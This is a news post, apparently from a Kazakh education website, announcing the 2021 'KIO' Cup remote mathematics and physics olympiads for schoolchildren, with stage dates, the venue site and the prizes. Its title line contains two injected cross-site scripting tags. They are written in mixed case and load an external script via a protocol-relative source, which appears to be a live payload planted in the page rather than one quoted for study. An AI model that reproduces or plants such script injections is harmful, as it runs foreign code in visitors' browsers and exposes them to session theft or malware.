Математика және физика пәндері бойынша оқушыларға олимпиада<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.01.2021

«Қазақстандық Интернет Олимпиадалар» ақпараттық порталы талантты оқушыларды анықтау және оларды қолдау, интеллектуалды сайыстарға қатысуын ынталандыру мақсатында математика және физика пәндері бойынша «ҚИО» Кубогына республикалық қашықтық олимпиадаларын (бұдан әрі – Олимпиада) өткізеді.

Олимпиада www.cdo.kz сайтында өтеді.

Қашықтық пәндік олимпиадалар 2 кезеңмен өткізілетін болады:

1     кезең: 2021 жылғы 25-ші қаңтар мен 25-ші ақпан аралығында

1 кезең қорытындысы: 2021 жылғы 3 наурыз (екінші кезеңге     өткен қатысушылар анықталады)

2     кезең:

Математика: 2021 жылғы 9 наурыз

Физика: 2021 жылғы 10 наурыз (өткен қатысушылар үшін қатысу тегін)

Олимпиада  жеңімпаздары  мен жүлдегерлері I, II, III дәрежелі дипломдарымен марапатталады. Олимпиадада 4 пәннен «Қыс-Көктем» мезгілі  қорытындысы  бойынша  ең  жоғары  ұпай жинаған  оқушылар бағалы сыйлықтармен (планшеттер, смартфондар, флешкалар және т.б.) марапатталады.

  А. Сыздыкова

Просмотров: 393


Пікір қосу



Деректерді қолтаңбаға қосу